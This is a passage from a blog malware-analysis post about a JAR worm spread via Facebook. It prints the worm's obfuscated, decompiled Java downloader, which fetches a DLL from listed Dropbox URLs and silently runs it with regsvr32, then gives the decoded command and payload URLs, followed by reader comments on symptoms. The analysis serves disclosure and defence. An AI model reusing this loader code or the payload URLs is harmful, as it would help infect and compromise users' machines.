    StringBuilder EXRCSQZHBXONTDCJDKHHGQXL = new StringBuilder(FYTFHDCQEJALCVHVO.length);
    for (int i = 0; i < FYTFHDCQEJALCVHVO.length; i++) {
      Object NXCJBUAWXRGTXWMAHLVXKDY = PTTQWFAFBA.eval(FYTFHDCQEJALCVHVO[i]);
      int HOFMVNSB = Integer.parseInt(dec.format(NXCJBUAWXRGTXWMAHLVXKDY));
      EXRCSQZHBXONTDCJDKHHGQXL.append((char)HOFMVNSB);
    }
    return EXRCSQZHBXONTDCJDKHHGQXL.toString();
  }

  public static String MOXEQWXISCYNNWKTZZSFWDE() throws ScriptException {
    ScriptEngineManager VZMZHYUKGXVAIYWQQBWWL = new ScriptEngineManager();
    ScriptEngine PTTQWFAFBA = VZMZHYUKGXVAIYWQQBWWL.getEngineByName("js");
    String[] WNGLMMJMJETKBDUOXWG = { "5448-5334", "837-736", "-8790+8893", "3219-3104", "382084/3238", "9614-9500", "-6355+6406", "-8462+8512", "1986-1954", "8435-8388", "-245+360" };
    DecimalFormat dec = new DecimalFormat("#.#");
    StringBuilder QSPKYREOAFQCRN = new StringBuilder(WNGLMMJMJETKBDUOXWG.length);
    for (int i = 0; i < WNGLMMJMJETKBDUOXWG.length; i++) {
      Object MAGXWHPMLWCNYSQWDSMLQXDB = PTTQWFAFBA.eval(WNGLMMJMJETKBDUOXWG[i]);
      int HOFMVNSB = Integer.parseInt(dec.format(MAGXWHPMLWCNYSQWDSMLQXDB));
      QSPKYREOAFQCRN.append((char)HOFMVNSB);
    }
    return QSPKYREOAFQCRN.toString();
  }

  public static String IBUPOZJE() throws ScriptException {
    ScriptEngineManager VZMZHYUKGXVAIYWQQBWWL = new ScriptEngineManager();
    ScriptEngine PTTQWFAFBA = VZMZHYUKGXVAIYWQQBWWL.getEngineByName("js");
    String[] AWEJEIHRHYSRQJROC = { "-9628+9692", "-2870+2934" };
    DecimalFormat dec = new DecimalFormat("#.#");
    StringBuilder CKUNUFCT = new StringBuilder(AWEJEIHRHYSRQJROC.length);
    for (int i = 0; i < AWEJEIHRHYSRQJROC.length; i++) {
      Object XUQOYXRSCEBJYGAVPNYEOX = PTTQWFAFBA.eval(AWEJEIHRHYSRQJROC[i]);
      int HOFMVNSB = Integer.parseInt(dec.format(XUQOYXRSCEBJYGAVPNYEOX));
      CKUNUFCT.append((char)HOFMVNSB);
    }
    return CKUNUFCT.toString();
  }

  public static void EEZDHQ() throws ScriptException, IOException, InterruptedException {
    int d = 0;
    while (d < 15) {
      Runtime.getRuntime().exec(MOXEQWXISCYNNWKTZZSFWDE() + " " + CAHWNGGYPLSBBUUNSBJ() + YFQZBLOYEFEJKKEZX());
      Thread.sleep(765L);
      d++;
    }
  }

  public static void WRZSTL(String TLOLIOXWCPD, String QVBBFQEDYWO) throws IOException, ScriptException, InterruptedException
  {
    InputStream WHBMGLAOEDNRJGMHKUKECXJJ = URI.create(TLOLIOXWCPD).toURL().openStream();
    Files.copy(WHBMGLAOEDNRJGMHKUKECXJJ, Paths.get(QVBBFQEDYWO, new String[0]), new CopyOption[0]);
    EEZDHQ();
  }

  public static void main(String[] args) throws Exception
  {
    new File(CAHWNGGYPLSBBUUNSBJ()).mkdir();
    File q = new File(CAHWNGGYPLSBBUUNSBJ() + YFQZBLOYEFEJKKEZX());
    if (q.exists())
    {
      EEZDHQ();
    }
    else {
      String[] VRNBQZSLUR = PACVA().split(IBUPOZJE());
      for (String DXFKOE : VRNBQZSLUR)
      {
        URL currentDXFKOE = new URL(DXFKOE);
        HttpURLConnection UKGANNEOZAGVBOQAMFBXU = (HttpURLConnection)currentDXFKOE.openConnection();
        UKGANNEOZAGVBOQAMFBXU.connect();
        if (UKGANNEOZAGVBOQAMFBXU.getResponseCode() / 100 == 2) {
          String HFCIHAULSQLBJMNFAFQ = DXFKOE;
          String CPTENFMT = CAHWNGGYPLSBBUUNSBJ() + YFQZBLOYEFEJKKEZX();
          WRZSTL(HFCIHAULSQLBJMNFAFQ, CPTENFMT);
          break;
        }
      }
    }
  }
}

Obviously, code like this will not make much sense to anybody, and it’s obvious that it was processed by some kind of an obfuscator. The presence of a HttpURLConnection object is already a red flag, though : after removing all the potentially malicious calls, and placing prints for the strings that are de-obfuscated at runtime, I got the following :

C:\\Temp\\DVUXW.CFG
regsvr32 /s C:\\Temp\\DVUXW.CFG
http://dl.dropboxusercontent.com/s/7zarvflw06m1ji6/d.dat?dl=1
http://dl.dropboxusercontent.com/s/sa3p6wrzf0zy7i0/d.dat?dl=1
http://dl.dropboxusercontent.com/s/stcwzraev6sn737/d.dat?dl=1
http://dl.dropboxusercontent.com/s/z7qwlu6a4ebur42/d.dat?dl=1
http://dl.dropboxusercontent.com/s/nahl719yv1clfgh/d.dat?dl=1
http://dl.dropboxusercontent.com/s/01eu6v9k9qdqytl/d.dat?dl=1
http://dl.dropboxusercontent.com/s/m2xqgwrovsu2r0s/d.dat?dl=1
http://dl.dropboxusercontent.com/s/xyk6wr8u398f5qu/d.dat?dl=1
http://dl.dropboxusercontent.com/s/0g26j25dmgopwgj/d.dat?dl=1
http://dl.dropboxusercontent.com/s/4b5n0u8ewyhiscu/d.dat?dl=1
http://dl.dropboxusercontent.com/s/xcy363g2g6p5h4l/d.dat?dl=1
http://dl.dropboxusercontent.com/s/ynywr9xtuzuka2l/d.dat?dl=1
http://dl.dropboxusercontent.com/s/fh96wwkglc2llc6/d.dat?dl=1
http://dl.dropboxusercontent.com/s/v9n0zyihubtkwsr/d.dat?dl=1
http://dl.dropboxusercontent.com/s/f1im03ehlktt8sg/d.dat?dl=1
http://dl.dropboxusercontent.com/s/g8e13mvq81okkex/d.dat?dl=1
http://dl.dropboxusercontent.com/s/s52kdkgliorkm0w/d.dat?dl=1
http://dl.dropboxusercontent.com/s/leadshosghvn6kg/d.dat?dl=1
http://dl.dropboxusercontent.com/s/uguzdum6pvhlgub/d.dat?dl=1
http://dl.dropboxusercontent.com/s/2gk8gv6prulwtnj/d.dat?dl=1
http://dl.dropboxusercontent.com/s/ozpa6xi3kue6tzq/d.dat?dl=1
http://dl.dropboxusercontent.com/s/blyr3qultzy6znv/d.dat?dl=1
http://dl.dropboxusercontent.com/s/nq2clxp5bp14ugm/d.dat?dl=1
http://dl.dropboxusercontent.com/s/6d4hq9mia5lamt2/d.dat?dl=1
http://dl.dropboxusercontent.com/s/3uerar72jy3gbil/d.dat?dl=1
http://dl.dropboxusercontent.com/s/avw8qqbfdsf8e91/d.dat?dl=1
http://dl.dropboxusercontent.com/s/h02dpsvoyonu4ws/d.dat?dl=1
http://dl.dropboxusercontent.com/s/8a3tqwxefjzo05q/d.dat?dl=1
http://dl.dropboxusercontent.com/s/rrq3txn4sbvf82r/d.dat?dl=1
http://dl.dropboxusercontent.com/s/u1oe3ppkbcqm2m5/d.dat?dl=1

I have to say that the obfuscator did a pretty good on scrambling these. From what I can gather, the JAR is responsible for calling regsvr32 on the DVUXW.CFG file, and download it from a Dropbox account if it’s not present on the system yet. The file itself is actually a DLL. I downloaded it and tried to dissect it on my Windows XP virtual machine, but I did not get far : it is quite big. However, it imports the most important functions from the Windows Cryptography API, as well as WriteFile. However, I was not able to see any communication attempts or socket creation inside the code, which means that this is probably not a piece of ransomware like CryptoLocker. It seems like the binary can be identified by the strings fuckoffnabs1 and myNameIsPepe present inside it. I also submitted the binary to Malwr for analysis.

Informacje o Daniel

freezingly cold soul
Ten wpis został opublikowany w kategorii Uncategorized i oznaczony tagami , , , , , . Dodaj zakładkę do bezpośredniego odnośnika.

4 odpowiedzi na „Worms distributed via Facebook : a case study

  1. kotisded pisze:

    Damn i have it also, i recieved it via facebook from a programmer, so i opened it. I allready deleted dxuxw.cfg. I already noticed that some program called AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA + some more A is autostarting with windows, You can see it in msconfig. We`ll see what`ll happend, i`ll monitor cpu, ram, and web connections.

  2. kotisded pisze:

    It started few proceses called explorer.exe *32, one of them was always using one thread full time while connected to internet. Some files were also located in c:\users\*\Appdata\Microsoft\Windows\Temp. Few also in registry. ComboFix fixed almost everything- AAAAAAAAAAAAAAAAAAA(*) proces was in msconfig on startup. I disabeled it and everything works fine for now.

  3. Lucas pisze:

    What can I do with friend’s computer if he had run this .jar and it has started spamming people on facebook with this?

    • Daniel pisze:

      Unfortunately, I have no idea. However, I doubt if these jar/dll files are actually responsible for spreading themselves : the only thing the JAR does is download the DLL, and I haven’t seen any WinSock calls in the DLL, which would obviously be needed in order to post anything to Facebook. I can only speculate, but I guess that these messages are the job of a FB application, or a malicious plugin installed inside the browser.

Skomentuj

Wprowadź swoje dane lub kliknij jedną z tych ikon, aby się zalogować:

Logo WordPress.com

Komentujesz korzystając z konta WordPress.com. Log Out / Zmień )

Zdjęcie z Twittera

Komentujesz korzystając z konta Twitter. Log Out / Zmień )

Facebook photo

Komentujesz korzystając z konta Facebook. Log Out / Zmień )

Google+ photo

Komentujesz korzystając z konta Google+. Log Out / Zmień )

Connecting to %s